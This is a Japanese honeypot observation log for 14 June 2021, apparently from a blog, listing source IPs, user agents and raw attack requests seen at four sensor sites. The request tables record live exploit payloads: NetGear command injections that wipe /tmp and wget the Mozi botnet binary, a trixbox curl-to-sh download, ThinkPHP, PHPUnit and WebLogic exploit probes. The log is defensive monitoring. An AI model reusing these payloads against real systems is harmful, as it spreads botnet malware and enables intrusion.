コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/06/14 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/06/14分です。

特徴
共通

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
gbrmssによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
RestSharpによるスキャン行為
phpMyAdminへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
Gh0stRATのような動き
を確認しました。

Location:US

GPONルータの脆弱性を狙うアクセス
を確認しました。

Location:UK

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Oracle WebLogic脆弱性(CVE-2020-14882,CVE-2020-14883,CVE-2020-14750)を狙うアクセス
Nmap Scripting Engineによるスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
を確認しました。

Location:SG

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
trixboxの脆弱性(CVE-2017-14537)を狙うアクセス
5[.]188[.]210[.]227に関する不正通信
を確認しました。

アクセス数推移

JP:総アクセス数:43 (前日比:-108)
US:総アクセス数:30 (前日比:-18)
UK:総アクセス数:165 (前日比:+127)
SG:総アクセス数:58 (前日比:+25)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.92.88.76 United States
1 5.62.35.171 United Kingdom
1 5.188.210.227 Russia
1 31.210.20.100 Netherlands
3 35.172.194.57 United States
1 42.87.21.14 China
11 45.146.165.123 Russia
1 47.241.193.60 United States
1 47.253.96.177 United States
1 51.195.135.36 France
1 54.198.81.168 United States
1 66.240.205.34 United States
1 69.162.231.196 United States
1 77.247.108.42 Belize
1 102.68.110.65 Nigeria
2 135.125.244.48 France
5 135.125.246.189 France
1 139.162.145.250 Netherlands
1 142.93.147.128 United States
1 167.71.14.11 United States
1 178.175.39.116 Albania
1 180.149.125.175 Mongolia
1 183.136.225.14 China
1 192.241.214.249 United States
1 192.241.217.10 United States
1 196.89.228.233 Morocco

UserAgent一覧

件数 UserAgent
4 -
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
16 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
1 Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148
2 Mozilla/5.0 zgrab/0.x
1 RestSharp/106.11.7.0
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
1 \x16\x03\x01
1 CONNECT pv[.]sohu[.]com/:443 HTTP/1.1
16 GET /.env HTTP/1.1
1 GET /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /phpmyadmin/ HTTP/1.1
1 GET /recordings/theme/main.css HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//178[.]175[.]39[.]116:54531/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 GET http[:]//passport[.]baidu[.]com/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /cgi-bin/system_mgr.cgi? HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
2 20.96.176.70 United States
1 23.106.215.220 United States
1 31.210.20.100 Netherlands
11 45.146.165.123 Russia
1 54.162.210.32 United States
1 58.179.132.211 Australia
1 77.247.108.42 Belize
1 103.145.13.222 India
1 143.110.208.187 United States
3 163.172.159.134 United Kingdom
1 172.105.89.161 United States
1 180.149.125.175 Mongolia
1 192.241.216.107 United States
1 192.241.217.134 United States
1 192.241.218.105 United States
1 209.141.33.143 United States
1 212.192.241.87 Czechia

UserAgent一覧

件数 UserAgent
3 -
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:60.0.1) Gecko/20100101 Firefox/60.0.1
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 zgrab/0.x
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
4 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /cgi-bin/jarrewrite.sh
1 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /recordings/theme/main.css HTTP/1.0
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /storfs-asup HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//futility[.]best/6173caf59895f2dcb9a488b321f66df75c1cb37071886fe0a0b9065159c059dfeb37bd705c4d909957832e7166f2e3775a0029035870fd64824c6cf7e6693003c1d5f80a1d08ac7f37649f306a0fce8eb5d8b8740403974caba0aa398e2b8463 HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.210.227 Russia
1 31.210.20.100 Netherlands
11 45.146.165.123 Russia
7 51.15.187.153 France
1 51.81.196.145 United States
1 52.188.206.167 United States
1 66.240.205.34 United States
1 77.247.108.42 Belize
1 95.132.169.159 Ukraine
1 103.145.13.222 India
65 130.61.233.198 United States
65 132.145.53.85 United States
1 149.129.50.37 Singapore
1 178.128.27.102 United States
1 178.175.14.169 Albania
1 178.175.74.7 Albania
1 180.149.125.175 Mongolia
1 192.241.216.133 United States
1 192.241.219.105 United States
1 209.141.47.35 United States
1 212.192.241.87 Czechia

UserAgent一覧

件数 UserAgent
5 -
1 Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
130 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
2 Mozilla/5.0 zgrab/0.x
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
1 EQUV / HTTP/1.1
1 GET /.env HTTP/1.1
2 GET /.git/HEAD HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
2 GET /HNAP1 HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
2 GET /admin/info/config HTTP/1.1
2 GET /api/spec.json HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
2 GET /console/css/%252E%252E%252Fconsole.portal HTTP/1.1
2 GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1
2 GET /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
2 GET /console/images/%252e%252e%252fconsole.portal HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /nmaplowercheck1623528402 HTTP/1.1
1 GET /nmaplowercheck1623604652 HTTP/1.1
2 GET /opc/v1/identity HTTP/1.1
2 GET /opc/v1/instance HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /recordings/theme/main.css HTTP/1.0
2 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//95[.]132[.]169[.]159:47954/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /spec/api.json HTTP/1.1
2 GET /ui HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 GET http[:]//www[.]proxylists[.]net/proxyjudge.php HTTP/1.1
2 HEAD /actuator HTTP/1.1
2 HEAD /actuator/auditevents HTTP/1.1
2 HEAD /actuator/beans HTTP/1.1
2 HEAD /actuator/conditions HTTP/1.1
2 HEAD /actuator/configprops HTTP/1.1
2 HEAD /actuator/env HTTP/1.1
2 HEAD /actuator/health HTTP/1.1
2 HEAD /actuator/heapdump HTTP/1.1
2 HEAD /actuator/httptrace HTTP/1.1
2 HEAD /actuator/hystrix.stream HTTP/1.1
2 HEAD /actuator/info HTTP/1.1
2 HEAD /actuator/jolokia HTTP/1.1
2 HEAD /actuator/loggers HTTP/1.1
2 HEAD /actuator/mappings HTTP/1.1
2 HEAD /actuator/metrics HTTP/1.1
2 HEAD /actuator/scheduledtasks HTTP/1.1
2 HEAD /actuator/threaddump HTTP/1.1
2 HEAD /auditevents HTTP/1.1
2 HEAD /autoconfig HTTP/1.1
2 HEAD /beans HTTP/1.1
2 HEAD /cloudfoundryapplication HTTP/1.1
2 HEAD /configprops HTTP/1.1
2 HEAD /dump HTTP/1.1
2 HEAD /env HTTP/1.1
2 HEAD /health HTTP/1.1
2 HEAD /heapdump HTTP/1.1
2 HEAD /hystrix.stream HTTP/1.1
2 HEAD /info HTTP/1.1
2 HEAD /jolokia HTTP/1.1
2 HEAD /loggers HTTP/1.1
2 HEAD /mappings HTTP/1.1
2 HEAD /metrics HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
2 HEAD /threaddump HTTP/1.1
2 HEAD /trace HTTP/1.1
22 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /HNAP1/ HTTP/1.0
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/system_mgr.cgi? HTTP/1.1
2 POST /sdk HTTP/1.1
1 POST /storfs-asup HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
6 PROPFIND / HTTP/1.1
1 RJSL / HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.122.53 Romania
1 5.188.210.227 Russia
1 18.212.155.135 United States
1 20.75.49.253 United States
2 20.96.176.70 United States
1 31.210.20.100 Netherlands
22 45.146.165.123 Russia
3 51.158.78.179 France
4 77.247.108.42 Belize
1 89.248.165.240 United Kingdom
1 102.68.110.65 Nigeria
1 103.28.70.137 United States
1 120.85.113.138 China
1 128.199.255.164 United Kingdom
1 134.122.15.187 United States
3 163.172.168.251 United Kingdom
2 180.149.125.175 Mongolia
1 183.136.225.14 China
1 192.241.204.176 United States
1 192.241.216.251 United States
1 192.241.217.132 United States
1 194.33.45.237 United Kingdom
2 194.61.24.17 Russia
1 201.140.178.25 Mexico
1 209.141.33.143 United States
2 212.192.241.87 Czechia

UserAgent一覧

件数 UserAgent
9 -
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 OPR/54.0.2952.64
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
2 Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:60.0.1) Gecko/20100101 Firefox/60.0.1
8 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 zgrab/0.x
3 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
3 \x03
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
1 GET /%1b%5d%32%3b%6f%77%6e%65%64%07%0a necho
8 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /cgi-bin/jarrewrite.sh
2 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /maint/modules/home/index.php?lang=english curl%20-s%2077.247.108.42/g/%3FshFrPbN0%3DIPAPY%7Csh&||x|HTTP/1.0
1 GET /portal/redlion HTTP/1.1
2 GET /recordings/theme/main.css HTTP/1.0
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /admin/config.php HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/system_mgr.cgi? HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//niezwykla[.]website/2e192ab3a7d70d0a6d5ba91e8dad35183c0b0404007cb81628fe314f34804401b2e92248e10b75adbc851d8d03180d0b98c32a76e8e65bce33009eb658b8a46bb0393a32e1f9c7f6e1b45cccaaca8fdce945d823fb448132aeca0098ce028283 HTTP/1.1
1 POST http[:]//pomidorowa[.]xyz/e3671401d065d7cd3e8ffaf93be28ebc6a366b14ff78a31d0d590611e5f027ce8bc2fb7f1ab3f7a23e13f1c90431ac4d84b2eca5071c5f5892afe2e9acaaeff87ce2e1db0ad423f423497aed05d39583925a2f136702abdb97348f155686a01c HTTP/1.1